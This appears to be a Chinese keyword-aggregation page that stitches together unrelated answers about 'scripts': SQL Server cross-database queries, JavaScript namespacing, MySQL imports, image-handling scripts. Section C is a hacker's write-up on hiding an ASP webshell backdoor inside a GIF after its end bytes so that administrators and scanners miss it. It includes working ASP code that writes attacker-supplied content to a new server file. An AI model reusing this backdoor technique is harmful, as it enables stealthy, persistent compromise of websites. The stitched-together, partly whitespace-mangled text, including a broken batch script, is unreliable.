1. 两种情况,在一台服务器上的多个数据库
2. sql 如下:
select * from 数据库1.dbo.表1 union all select * from 数据库2.dbo.表1 union all select * from 数据库3.dbo.表1
3. 第二中情况,多台服务器上的数据库
4.同样的在SQL Server2005中也可以链接到其他的SQL Server数据库,
5. 请参考下列图片:
6. 简单SQL 如下:
下面就可以直接在本地查询远程数据库的表了: select * from [server1].[数据库1].[dbo].表1
B. 如何编写JavaScript脚本库
1.不要使用版本检测,而要使用能力检测
由于浏览器的类型和版本太多,以及不断的新的浏览器出现,我们不可能投入大量的时间和成本去实践检测各种版本的浏览器。"浏览器检测"也叫"版本检测"通常被认为是一种错误的做法,浏览器检测的最佳实践是能力检测,通常也被称为对象检测,指的是在代码执行之前检测某个脚本对象or方法是否存在,而不是依赖于你对哪个浏览器具有哪些特定的了解。如果必须的对象和方法存在,那么说明浏览器能够使用它,而且代码也可以按照预期执行。能力检测使用<if(xxx.xxxx)>的方式
[javascript] view plain print?
// JavaScript Document
if(document.body && document.body.getElementsByTagName){
//使用document.body.getElementsByTagName的代码
}
2.使用命名空间
当使用多个js库文件时,为了避免在调用时不同js库文件的同名函数的冲突,一般会使用命名空间来解决。JavaScript支持同名函数,但只使用最后一个加载的函数(不支持重载,不会考虑参数,只看函数名字), 哪一个最后被加载,哪一个就会被调用到。所以不使用命名空间的话,就很容易遇到同名函数冲突的问题。
使用命名空间的两点原则:唯一性,不共享。
唯一性:挑选一个独一无二的命名空间的名字(如Google Maps在所有的标识符中都添加了G前缀),注意js是大小写敏感的。
不共享:不共享意味着什么都不共享;当你创建自己的$函数时你可能会与着名的库(如Prototype)中的$函数发生冲突而导致Prototype中的$无法使用,为了不与着名的一些库(jQuery、prototype)或者其他已有的一些函数冲突,使用匿名函数来实现代码的不共享。如:要保证只有你自己使用这个$()函数,你可以使用一个JS小技巧。
//匿名函数
(function(){
//code,运行的代码
})();
注意:()在JavaScript中有两种含义:一是运算符;二是分隔符。
上面匿名函数需要说明两点:
①红色括号里是一个匿名函数,红色括号代表分割,表示里面的函数是一个部分;
②绿色括号表示一个运算符,表示红色括号里面的函数要运行;相当于定义完一个匿名函数后就让它直接运行。
C. 图片内加入脚本
现在从注入拿WEBSHELL看来成功率都比较高了。拿到SHELL后,安装自己的脚本后门,常常被查杀。 脚本后门的发展史:
1。最开始就是直接放一个ASP文件上去。
2。把ASP文件加密才放上去。
3。把脚本插入到代码中去。(我经常用这种) 不过一样被查得出来,我前段时候手工检测一个站的脚本安全。发现这个站被种了21个木马。所以我就想到了,怎么样才能不被发现不能被查杀。 最后我研究了一下如果把脚本插入到图片中。然后在ASP中调用图片中的脚本程序应该就可以了。 测试的时候通过了。现在我把我的心德写一下。让大家来分析一下。共同进步和完善这种方法。 在研究过程中我看了GIF图片的结构文档方面的书。 GIF图片都是以 00 3B 为结束的。换句话说00 3B 后面的不会显示出来。所以我们在00 3B后面插入代码就行了。当然代码我们加密放到图片中去效果更好。我写了一个程序来这么做。 这里要说一下,在图片中00 3B后面的是不会显示出来的。 但其中的代码已经运行了。图片也会正常显示出来。 测试:
在图片后面加入:<%=now%>
然后在一个ASP文件中加入:<!--#include file="aaa.gif" --> 然后你们下载这个图片,发现图片最后面变成了时间。很正常因为图片放到了ASP脚本中运行了其中的代码。 换句话来说,如果写的是一段生成文件的脚本。那么我们提交特定的参数让图片中的代码去生成文件。这样就实现了我们的后门。 1:这种方法要做的工作就是在目标站点中找一张GIF图片然后把代码插入到图片中,再上传到站点中去。这样作管理员很难找到木马在哪里。打死也想不到木马在图片中。 2:我们插入的代码只有一行就是那个include file .....
找个文件大点的ASP文件给插进去就行了。 然后我们在本地POST数据提交给ASP引用图片的URL这样就完成了工作。 我的插入图片的脚本: <% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% fdata = request("cyfddata") %>
<% if fdata<>"" then %>
<% syfdpath=server.mappath(Request.ServerVariables("SCRIPT_NAME"))&"\ok.asp"%>
<% Set objCountFile=objFSO.CreateTextFile(syfdapth,True) %>
<% objCountFile.Write fdata %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %> 这段代码主要就是在当前目录下生成一个ok.asp文件。
文件内容是由我们提交的数据.用request("cyfddata")来获取的。 这段代码加密后插入到图片中去。下面我把我程序的代码贴出来。 本地自己构建一个提交表单向ASP文件提交(加入图片那个文件) 表单文本框输入内容名称是:cyfddata 后感:
我本人认为这种方法,管理员很难查到。这是我两天前想到的作出来了,可能有些问题希望和大家一起讨论,必竞,为了追求技术就得研究技术。
共享知识,从而升华。
感觉去研究一些新东西,人活得更XS些。
D. mysql数据库 清理数据的脚本!脚本问题!
步骤如下:
首先使用mysql提供的命令行界面来导入数据库,确保自己的电脑中安装了mysql数据库,可以通过命令行来确认是否安装了mysql数据库,当然,第一步是打开mysql的数据库服务,使用命令行来打开:如下图所示:
启动mysql后,找到需要用到的脚本文件,也就是数据库文件,首先得建立一个数据库,这样才可以导入脚本,如下图所示:
在将脚本拷到本地磁盘的根目录,这样方便进入找到脚本,这里以d盘来说明,使用test.sql:接着来到命令行,使用source
d:/test.sql;来导入数据库,先进入mysql,如下图所示:
首先要在数据库中建立好数据库,然后导入脚本,所以先建立一个数据库,不要脚本是不知道要往哪个数据库中导入脚本的,如下图所示:
然后就可以输入导入.sql文件命令:
mysql>
use
数据库名;
mysql>
source
d:/test.sql;
如下图所示:
看到上面的画面,说明mysql数据库已经导入成功了。
E. 脚本大师如何抓取图片,应该存在哪个文件才有能自动对比图片 急
打酱油的
F. 脚本如何插入多张图片
把你要在插入的三张图设为B C D
FindPic 820,777,1070,792,"Attachment:\A.bmp" OR "Attachment:\B.bmp" OR "Attachment:\C.bmp" OR "Attachment:\D.bmp" ,1.0,intX,intY
以此类推空一个加OR在空一个然后插入目录名称
G. 写一个Python脚本批处理图片
· 找出所有图片
· PIL 载入图片
· 判断图片是否需要编辑
· 如需要,进行编辑
· 保存
· 回到第二步。
H. rpg maker xp脚本大全,常用的,像45°战斗视角,还有什么的,最好有仙剑系列的脚本大全加上所需图片。
去66rpg上找 ,那有资料库。
I. windows下脚本生成图片清单
@echooff&title生成图片名清单By依梦琴瑶
cd/d%~dp0
::设置图片格式
setExt=*.jp*g,*.png,*.bmp,*.gif
(for%%ain(%Ext%)do(
echo"%%~na"|findstr/i"cat">nul2>nul&&echo%%~a1
echo"%%~na"|findstr/i"fish">nul2>nul&&echo%%~a2
))>图片名清单.txt
pause
J. 什么是脚本组件库
脚本script是使用一种特定的描述性语言,依据一定的格式编写的可执行文件,又称作宏或批处理文件。脚本通常可以由应用程序临时调用并执行。各类脚本目前被广泛地应用于网页设计中,因为脚本不仅可以减小网页的规模和提高网页浏览速度,而且可以丰富网页的表现,如动画、声音等。举个最常见的例子,当我们点击网页上的E-mail地址时能自动调用Outlook Express或Foxmail这类邮件软件,就是通过脚本功能来实现的。也正因为脚本的这些特点,往往被一些别有用心的人所利用。例如在脚本中加入一些破坏计算机系统的命令,这样当用户浏览网页时,一旦调用这类脚本,便会使用户的系统受到攻击。所以用户应根据对所访问网页的信任程度选择安全等级,特别是对于那些本身内容就非法的网页,更不要轻易允许使用脚本。通过“安全设置”对话框,选择“脚本”选项下的各种设置就可以轻松实现对脚本的禁用和启用。